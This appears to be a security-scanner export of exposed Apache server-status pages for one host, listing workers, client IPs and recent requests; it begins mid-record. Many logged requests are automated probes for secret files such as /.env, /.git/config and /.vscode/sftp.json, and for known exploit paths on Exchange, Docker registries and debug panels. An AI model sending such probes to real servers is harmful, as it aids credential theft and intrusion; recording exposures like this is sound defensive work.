0/1/1/0/0 (open/recv/resp/push/rst) 1-466803150/37/1163_ 7.27502087740.00.237.28 164.92.84.255h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-466803150/40/1118_ 7.590602526560.00.2710.23 164.92.84.255http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-466803150/31/1135_ 7.571651960510.00.1512.69 164.92.84.255http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-466803150/41/1178_ 7.31511928180.00.249.46 164.92.84.255h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-466803150/32/1118_ 7.24402103230.00.2223.30 164.92.84.255http/1.1 1-466803150/41/1148_ 7.47131965040.00.278.32 222.79.103.59http/1.1localhost:80GET / HTTP/1.1 1-466803150/29/1129_ 7.41332002880.00.1710.48 164.92.84.255http/1.1 1-466803150/34/1110_ 7.24301913250.00.189.92 164.92.84.255http/1.1 1-466803150/39/1155_ 7.44222239220.00.2411.30 94.102.61.75http/1.1ravignon.mycloud.paris:443GET /core/img/favicon.ico HTTP/1.1 1-466803150/30/1161_ 7.572962283870.00.207.94 164.92.84.255http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-466803150/40/1106_ 7.572732092880.00.3018.86 164.92.84.255http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-466803150/35/1150_ 7.571602113440.00.238.06 164.92.84.255http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-466803150/31/1178_ 7.45212296420.00.1832.42 94.102.61.75http/1.1ravignon.mycloud.paris:443GET /core/img/favicon-touch.png HTTP/1.1 2-466803160/21/786_ 4.821516101419240.00.139.80 162.243.151.37http/1.1 2-466803160/20/808_ 4.831580101286050.00.117.49 54.36.115.221http/1.1 2-466803160/22/804_ 4.861580121515360.00.1422.51
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c480519e76bfe
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Monday, 06-Nov-2023 03:25:24 UTC Restart Time: Friday, 06-Oct-2023 03:05:25 UTC Parent Server Config. Generation: 37 Parent Server MPM Generation: 36 Server uptime: 31 days 19 minutes 59 seconds Server load: 0.00 0.00 0.00 Total accesses: 38568 - Total Traffic: 506.4 MB - Total Duration: 42779283 CPU Usage: u80.05 s162.23 cu285.7 cs76.63 - .0226% CPU load .0144 requests/sec - 198 B/second - 13.4 kB/request - 1109.19 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1526160no0yes124000 2526161no0yes025000 Sum200 149000 .........................________________________W______________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-8-0/0/326. 0.0019131210589730.00.002.19 120.198.36.66http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.0019131210543720.00.002.28 27.195.120.92http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/336. 0.0019131210545190.00.002.42 69.164.213.115http/1.1 0-8-0/0/318. 0.0019131212564660.00.002.68 94.102.61.75http/1.1ravignon.mycloud.paris:443GET /core/img/favicon-touch.png HTTP/1.1 0-8-0/0/310. 0.0019131210488710.00.002.01 164.52.0.93http/1.1 0-8-0/0/317. 0.0019131212513160.00.003.47 107.6.112.252http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/358. 0.0019131210606820.00.002.32 107.6.112.252http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-8-0/0/332. 0.0019131210573270.00.004.14 35.203.211.6http/1.1 0-8-0/0/327. 0.001913121210589440.00.002.36 162.55.103.197http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-8-0/0/343. 0.0019131211626100.00.004.02 95.214.55.115http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/297. 0.0019131210549710.00.002.35 35.203.211.6http/1.1 0-8-0/0/315. 0.001913121139532070.00.0011.75 112.26.65.151http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.0019131210555260.00.006.49 18.184.165.11http/1.1 0-8-0/0/332. 0.0019131210496420.00.002.08 35.203.211.6http/1.1 0-8-0/0/337. 0.00191312191555810.00.003.54 109.237.97.180http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-8-0/0/328. 0.0019131210602940.00.001.97 199.230.124.3http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/334. 0.0019131210517220.00.003.74 35.203.211.6http/1.1 0-8-0/0/321. 0.0019131213458780.00.004.09 185.36.81.33http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/319. 0.0019131211558050.00.002.20 173.214.166.170http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/330. 0.0019131210578770.00.002.16 44.197.188.109http/1.1 0-8-0/0/329. 0.0019131210582210.00.002.93 89.248.165.51http/1.1 0-8-0/0/348. 0.0019131212678910.00.002.44 101.74.200.170http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/339. 0.0019131211634660.00.0010.38 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-8-0/0/332. 0.0019131210627220.00.002.22 107.6.112.252http/1.1 0-8-0/0/310. 0.0019131210572310.00.001.83 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-365261600/0/833_ 0.00311485460.00.009.10 74.207.237.46h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-365261600/1/803_ 0.048452411426450.00.025.47 83.97.73.87http/1.1ravignon.mycloud.paris:443GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 1-365261600/0/793_ 0.0014621261441710.00.006.49 54.36.115.221http/1.1 1-365261600/1/829_ 0.02146231701270.00.009.29 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 1-365261600/0/786_ 0.00119811291333680.00.009.71 4.236.152.87http/1.1 1-365261600/1/849_ 0.011198101626910.00.0010.04 4.236.152.87http/1.1localhost:80GET /.env HTTP/1.1 1-365261600/0/805_ 0.0083701390740.00.006.04 197.40.84.108http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-365261600/0/808_ 0.0083801483300.00.007.26 197.210.28.188http/1.1 1-365261600/0/814_ 0.00401320440.00.0014.85 74.207.237.46h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-365261600/0/803_ 0.00112291601318230.00.0015.74 192.241.199.83http/1.1 1-365261600/0/813_ 0.0083816041621180.00.0018.35 197.210.28.188http/1.1 1-365261600/0/799_ 0.0031371474870.00.0011.72 74.207.237.46h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-365261600/0/816_ 0.0021341478890.00.005.16 74.207.237.46http/1.1 1-365261600/1/787_ 0.0483801911220.00.005.21 197.210.28.188http/1.1localhost:80GET /.env HTTP/1.1 1-365261600/0/810_ 0.00369551401390.00.0010.83 5.188.210.227http/1.1 1-365261600/0/820_ 0.0041501340870.00.005.60 74.207.237.46h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-365261600/0/800_ 0.0031281526680.00.0016.15 74.207.237.46http/1.1 1-365261600/0/808_ 0.00123221151396940.00.005.89 35.203.211.111http/1.1 1-365261600/1/779_ 0.0583811369270.00.008.40 197.210.28.188http/1.1localhost:80POST / HTTP/1.1 1-365261600/0/786_ 0.00221337710.00.007.47 74.207.237.46http/1.1 1-365261600/1/832_ 0.090731615030.00.007.26 74.207.237.46http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-365261600/1/800_ 0.090591511690.00.005.68 74.207.237.46http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-365261600/0/760_ 0.0002611390700.00.0016.05 43.156.249.99http/1.1 1-365261600/0/812_ 0.0001421478730.00.006.03 156.219.113.224http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 1-365261601/0/854W 0.00001706060.00.0022.17 74.207.237.46http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 2-365261610/1/422_ 0.0114622752170.00.004.28 54.36.115.221http/1.1 2-365261610/1/402_ 0.114107643350.00.013.36 74.207.237.46http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 2-365261610/1/411_ 0.0141719050.00.0015.60 71.6.232.22http/1.1localhost:80GET / HTTP/1.1 2-365261610/0/410_ 0.0012700520.00.002.95 42.60.125.237http/1.1localhost:80GET / HTTP/1.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805522cebcf
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Wednesday, 01-Nov-2023 00:04:06 UTC Restart Time: Friday, 06-Oct-2023 03:05:25 UTC Parent Server Config. Generation: 32 Parent Server MPM Generation: 31 Server uptime: 25 days 20 hours 58 minutes 41 seconds Server load: 0.00 0.00 0.00 Total accesses: 36363 - Total Traffic: 473.8 MB - Total Duration: 42454451 CPU Usage: u67.05 s135.41 cu266.81 cs72.18 - .0242% CPU load .0163 requests/sec - 222 B/second - 13.3 kB/request - 1167.52 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1438145no0yes124000 2438146no0yes025000 Sum200 149000 ........................._____________W_________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-8-0/0/326. 0.0014690440589730.00.002.19 120.198.36.66http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.0014690440543720.00.002.28 27.195.120.92http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/336. 0.0014690440545190.00.002.42 69.164.213.115http/1.1 0-8-0/0/318. 0.0014690442564660.00.002.68 94.102.61.75http/1.1ravignon.mycloud.paris:443GET /core/img/favicon-touch.png HTTP/1.1 0-8-0/0/310. 0.0014690440488710.00.002.01 164.52.0.93http/1.1 0-8-0/0/317. 0.0014690442513160.00.003.47 107.6.112.252http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/358. 0.0014690440606820.00.002.32 107.6.112.252http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-8-0/0/332. 0.0014690440573270.00.004.14 35.203.211.6http/1.1 0-8-0/0/327. 0.001469044210589440.00.002.36 162.55.103.197http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-8-0/0/343. 0.0014690441626100.00.004.02 95.214.55.115http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/297. 0.0014690440549710.00.002.35 35.203.211.6http/1.1 0-8-0/0/315. 0.001469044139532070.00.0011.75 112.26.65.151http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.0014690440555260.00.006.49 18.184.165.11http/1.1 0-8-0/0/332. 0.0014690440496420.00.002.08 35.203.211.6http/1.1 0-8-0/0/337. 0.00146904491555810.00.003.54 109.237.97.180http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-8-0/0/328. 0.0014690440602940.00.001.97 199.230.124.3http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/334. 0.0014690440517220.00.003.74 35.203.211.6http/1.1 0-8-0/0/321. 0.0014690443458780.00.004.09 185.36.81.33http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/319. 0.0014690441558050.00.002.20 173.214.166.170http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/330. 0.0014690440578770.00.002.16 44.197.188.109http/1.1 0-8-0/0/329. 0.0014690440582210.00.002.93 89.248.165.51http/1.1 0-8-0/0/348. 0.0014690442678910.00.002.44 101.74.200.170http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/339. 0.0014690441634660.00.0010.38 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-8-0/0/332. 0.0014690440627220.00.002.22 107.6.112.252http/1.1 0-8-0/0/310. 0.0014690440572310.00.001.83 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-314381450/0/781_ 0.000861378480.00.008.76 128.199.61.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-314381450/0/762_ 0.00001381550.00.005.16 128.199.61.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-314381450/0/737_ 0.00001381630.00.006.09 128.199.61.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-314381450/0/767_ 0.00011607120.00.005.82 128.199.61.251http/1.1 1-314381450/0/734_ 0.000701238800.00.009.35 128.199.61.251http/1.1 1-314381450/0/798_ 0.000571552520.00.009.68 128.199.61.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-314381450/0/763_ 0.00001347120.00.004.96 128.199.61.251http/1.1 1-314381450/0/768_ 0.000801327290.00.006.53 128.199.61.251http/1.1 1-314381450/1/780_ 0.030651278630.00.0014.51 74.207.237.114http/1.1localhost:80\x16\x03\x01\x01\t\x01 1-314381450/0/759_ 0.00001250250.00.0015.39 13.124.25.246http/1.1localhost:80GET /users/sign_in HTTP/1.1 1-314381450/1/769_ 0.030601557510.00.0015.19 128.199.61.251http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-314381450/0/759_ 0.00011417150.00.008.57 54.36.115.221http/1.1localhost:80GET /.env HTTP/1.1 1-314381450/1/775_ 0.03001423130.00.004.86 74.207.237.114http/1.1ravignon.mycloud.paris:80GET /.vscode/sftp.json HTTP/1.1 1-314381451/0/739W 0.00001859760.00.004.79 128.199.61.251http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-314381450/0/757_ 0.006711731354510.00.009.84 167.172.240.54h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-314381450/0/782_ 0.006721311740.00.005.40 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 1-314381450/0/753_ 0.006731462930.00.0015.84 94.102.61.10http/1.1localhost:80GET / HTTP/1.1 1-314381450/0/764_ 0.00671131317170.00.005.57 13.124.25.246http/1.1 1-314381450/0/740_ 0.00671251301660.00.008.10 167.172.240.54http/1.1 1-314381450/0/739_ 0.0067701276310.00.007.05 45.55.0.36http/1.1 1-314381450/0/771_ 0.006731438700.00.006.87 54.36.115.221http/1.1localhost:80POST / HTTP/1.1 1-314381450/0/750_ 0.00672291449950.00.005.35 139.144.22.91http/1.1 1-314381450/0/727_ 0.00672771359290.00.0015.80 31.43.185.65http/1.1 1-314381450/0/768_ 0.00671951430560.00.005.66 45.55.0.36http/1.1 1-314381450/0/823_ 0.00671341683270.00.0021.98 54.36.115.221http/1.1 2-314381460/1/377_ 0.001111655520.00.013.94 128.199.61.251http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 2-314381460/0/363_ 0.0011591880.00.002.96 89.190.156.174http/1.1 2-314381460/0/363_ 0.0002643450.00.0015.24 128.199.61.251http/1.1 2-314381460/0/367_ 0.0000662330.00.002.64 128.199.61.251h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-314381460/1/371_ 0.020
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c4805c43c5e63
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Thursday, 26-Oct-2023 23:23:46 UTC Restart Time: Friday, 06-Oct-2023 03:05:25 UTC Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 20 days 20 hours 18 minutes 21 seconds Server load: 0.00 0.00 0.00 Total accesses: 32850 - Total Traffic: 322.0 MB - Total Duration: 41981503 CPU Usage: u55.73 s110.65 cu236.22 cs62.95 - .0258% CPU load .0182 requests/sec - 187 B/second - 10.0 kB/request - 1277.98 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1325854no0yes025000 2325855no0yes124000 Sum200 149000 ........................._________________________W_____________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-8-0/0/326. 0.0010346240589730.00.002.19 120.198.36.66http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.0010346240543720.00.002.28 27.195.120.92http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/336. 0.0010346240545190.00.002.42 69.164.213.115http/1.1 0-8-0/0/318. 0.0010346242564660.00.002.68 94.102.61.75http/1.1ravignon.mycloud.paris:443GET /core/img/favicon-touch.png HTTP/1.1 0-8-0/0/310. 0.0010346240488710.00.002.01 164.52.0.93http/1.1 0-8-0/0/317. 0.0010346242513160.00.003.47 107.6.112.252http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/358. 0.0010346240606820.00.002.32 107.6.112.252http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-8-0/0/332. 0.0010346240573270.00.004.14 35.203.211.6http/1.1 0-8-0/0/327. 0.001034624210589440.00.002.36 162.55.103.197http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-8-0/0/343. 0.0010346241626100.00.004.02 95.214.55.115http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/297. 0.0010346240549710.00.002.35 35.203.211.6http/1.1 0-8-0/0/315. 0.001034624139532070.00.0011.75 112.26.65.151http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.0010346240555260.00.006.49 18.184.165.11http/1.1 0-8-0/0/332. 0.0010346240496420.00.002.08 35.203.211.6http/1.1 0-8-0/0/337. 0.00103462491555810.00.003.54 109.237.97.180http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-8-0/0/328. 0.0010346240602940.00.001.97 199.230.124.3http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/334. 0.0010346240517220.00.003.74 35.203.211.6http/1.1 0-8-0/0/321. 0.0010346243458780.00.004.09 185.36.81.33http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/319. 0.0010346241558050.00.002.20 173.214.166.170http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/330. 0.0010346240578770.00.002.16 44.197.188.109http/1.1 0-8-0/0/329. 0.0010346240582210.00.002.93 89.248.165.51http/1.1 0-8-0/0/348. 0.0010346242678910.00.002.44 101.74.200.170http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/339. 0.0010346241634660.00.0010.38 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-8-0/0/332. 0.0010346240627220.00.002.22 107.6.112.252http/1.1 0-8-0/0/310. 0.0010346240572310.00.001.83 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-233258540/10/719_ 1.03196901300490.00.018.41 162.216.150.161http/1.1 1-233258540/14/704_ 0.9512871301920.00.134.84 45.155.204.7http/1.1ravignon.mycloud.paris:443GET /vpn/index.html HTTP/1.1 1-233258540/11/671_ 1.06407301279970.00.035.76 165.22.47.52http/1.1ravignon.mycloud.paris:443 1-233258540/9/708_ 0.907101505610.00.035.47 167.99.197.112http/1.1 1-233258540/8/682_ 1.037101173990.00.007.96 103.187.190.30http/1.1localhost:80\x16\x03\x01\x02 1-233258540/14/741_ 1.0219691461482020.00.128.42 162.216.150.161http/1.1 1-233258540/12/712_ 0.95031288060.00.074.66 128.199.39.228http/1.1localhost:80GET / HTTP/1.1 1-233258540/13/711_ 0.9231901268870.00.076.08 159.203.44.43http/1.1 1-233258540/10/721_ 1.0736551611183390.00.064.62 47.89.193.239http/1.1ravignon.mycloud.paris:443GET /Public/home/js/check.js HTTP/1.1 1-233258540/13/692_ 1.141751174780.00.034.31 159.203.44.43http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-233258540/13/717_ 1.0355631456420.00.054.69 137.184.255.53h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-233258540/11/701_ 0.78196901295190.00.035.28 162.216.150.161http/1.1 1-233258540/10/715_ 0.92101370900.00.034.53 40.66.49.130http/1.1localhost:80GET /.env HTTP/1.1 1-233258540/11/689_ 0.75365501790730.00.034.47 128.199.39.228h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-233258540/16/698_ 1.141641278540.00.079.42 159.203.44.43http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-233258540/9/718_ 1.140811225470.00.015.05 159.203.44.43http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-233258540/10/697_ 0.8923591381363720.00.055.12 54.37.79.75http/1.1 1-233258540/13/700_ 1.10235921233130.00.075.22 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 1-233258540/6/690_ 0.73308801244220.00.007.81 152.89.198.113http/1.1 1-233258540/11/677_ 0.76235941215360.00.026.67 54.37.79.75http/1.1 1-233258540/9/718_ 0.78196901363940.00.014.89 162.216.150.161http/1.1 1-233258540/13/695_ 1.0936542271345810.00.094.99 47.251.14.232http/1.1ravignon.mycloud.paris:443GET /static/admin/javascript/hetong.js HTTP/1.1 1-233258540/11/682_ 0.9740731231298450.00.055.98 128.199.39.228http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-233258540/11/705_ 1.10235911355070.00.055.27 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-233258540/10/760_ 0.8636531311554790.00.0413.47 128.199.39.228h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-233258551/19/289W 2.0400530420.00.062.47 159.203.44.43http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 2-233258550/22/275_ 2.222100487550.00.061.81 159.203.44.43http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 2-233258550/24/290_ 2.16433101554270.00.144.85 167.99.4.184http/1.1ravignon.mycloud.paris:443POST /fileupload/toolsAny HTTP/1.1 2-233258550/22/285_ 2.230
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31933c4805933c48057c50dbec
Apache Status Apache Server Status for ravignon.mycloud.paris (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Monday, 23-Oct-2023 12:30:51 UTC Restart Time: Friday, 06-Oct-2023 03:05:25 UTC Parent Server Config. Generation: 21 Parent Server MPM Generation: 20 Server uptime: 17 days 9 hours 25 minutes 25 seconds Server load: 0.00 0.00 0.00 Total accesses: 29926 - Total Traffic: 286.2 MB - Total Duration: 5606466 CPU Usage: u44.1 s90.28 cu213.49 cs57.47 - .027% CPU load .0199 requests/sec - 199 B/second - 9.8 kB/request - 187.344 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1289753no0yes124000 2289754no0yes025000 Sum200 149000 .........................___W___________________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-8-0/0/326. 0.007362480589730.00.002.19 120.198.36.66http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.007362480543720.00.002.28 27.195.120.92http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/336. 0.007362480545190.00.002.42 69.164.213.115http/1.1 0-8-0/0/318. 0.007362482564660.00.002.68 94.102.61.75http/1.1ravignon.mycloud.paris:443GET /core/img/favicon-touch.png HTTP/1.1 0-8-0/0/310. 0.007362480488710.00.002.01 164.52.0.93http/1.1 0-8-0/0/317. 0.007362482513160.00.003.47 107.6.112.252http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/358. 0.007362480606820.00.002.32 107.6.112.252http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-8-0/0/332. 0.007362480573270.00.004.14 35.203.211.6http/1.1 0-8-0/0/327. 0.00736248210589440.00.002.36 162.55.103.197http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-8-0/0/343. 0.007362481626100.00.004.02 95.214.55.115http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/297. 0.007362480549710.00.002.35 35.203.211.6http/1.1 0-8-0/0/315. 0.00736248139532070.00.0011.75 112.26.65.151http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/326. 0.007362480555260.00.006.49 18.184.165.11http/1.1 0-8-0/0/332. 0.007362480496420.00.002.08 35.203.211.6http/1.1 0-8-0/0/337. 0.0073624891555810.00.003.54 109.237.97.180http/1.1ravignon.mycloud.paris:443GET /.env HTTP/1.1 0-8-0/0/328. 0.007362480602940.00.001.97 199.230.124.3http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/334. 0.007362480517220.00.003.74 35.203.211.6http/1.1 0-8-0/0/321. 0.007362483458780.00.004.09 185.36.81.33http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/319. 0.007362481558050.00.002.20 173.214.166.170http/1.1localhost:80GET / HTTP/1.1 0-8-0/0/330. 0.007362480578770.00.002.16 44.197.188.109http/1.1 0-8-0/0/329. 0.007362480582210.00.002.93 89.248.165.51http/1.1 0-8-0/0/348. 0.007362482678910.00.002.44 101.74.200.170http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-8-0/0/339. 0.007362481634660.00.0010.38 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-8-0/0/332. 0.007362480627220.00.002.22 107.6.112.252http/1.1 0-8-0/0/310. 0.007362480572310.00.001.83 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-202897530/1/636_ 0.00001108360.00.004.87 51.81.245.138http/1.1 1-202897530/1/650_ 0.14001232130.00.004.32 198.199.121.22http/1.1ravignon.mycloud.paris:80GET /.git/config HTTP/1.1 1-202897530/2/619_ 0.15001194610.00.015.42 198.199.121.22http/1.1ravignon.mycloud.paris:80GET /s/2393e2937313e2039313e2930313/_/;/META-INF/maven/com.atla 1-202897531/1/665W 0.03001440700.00.015.23 207.154.240.169http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-202897530/0/635_ 0.00211081270.00.007.53 18.116.87.230http/1.1ravignon.mycloud.paris:80GET /.well-known/acme-challenge/zykldxkZ3YeE__IfHK1srVLYoZlAX67 1-202897530/1/680_ 0.0822231381100.00.017.70 51.81.245.138http/1.1ravignon.mycloud.paris:443GET /index.php/login HTTP/1.1 1-202897530/0/660_ 0.0022741175790.00.004.22 207.154.240.169h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-202897530/0/651_ 0.00201186840.00.005.70 207.154.240.169h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-202897530/0/656_ 0.00101030290.00.004.16 207.154.240.169h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-202897530/1/651_ 0.09201119500.00.004.07 198.199.121.22http/1.1ravignon.mycloud.paris:80GET / HTTP/1.1 1-202897530/0/658_ 0.00101326460.00.004.19 207.154.240.169http/1.1 1-202897530/0/649_ 0.00111217790.00.004.95 103.56.61.139http/1.1localhost:80done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-202897530/0/666_ 0.00001296300.00.004.22 51.81.245.138http/1.1 1-202897530/0/638_ 0.00131694990.00.004.14 207.154.240.169http/1.1 1-202897530/0/648_ 0.0011541217000.00.009.05 207.154.240.169http/1.1 1-202897530/1/667_ 0.10101161190.00.004.65 198.199.121.22http/1.1ravignon.mycloud.paris:80GET /.vscode/sftp.json HTTP/1.1 1-202897530/0/640_ 0.0011771236720.00.004.71 207.154.240.169h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-202897530/1/649_ 0.1301531160600.00.014.93 51.81.245.138http/1.1ravignon.mycloud.paris:443GET /favicon.ico HTTP/1.1 1-202897530/1/649_ 0.1301401196760.00.017.54 207.154.240.169http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-202897530/0/623_ 0.00031143100.00.006.33 124.225.164.130http/1.1localhost:80GET / HTTP/1.1 1-202897530/1/663_ 0.1302641214330.00.014.50 51.81.245.138http/1.1ravignon.mycloud.paris:443GET /index.php/login HTTP/1.1 1-202897530/1/632_ 0.13001248930.00.004.37 198.199.121.22http/1.1ravignon.mycloud.paris:80GET /_all_dbs HTTP/1.1 1-202897530/0/629_ 0.0001291215130.00.005.63 54.36.115.221http/1.1 1-202897530/1/649_ 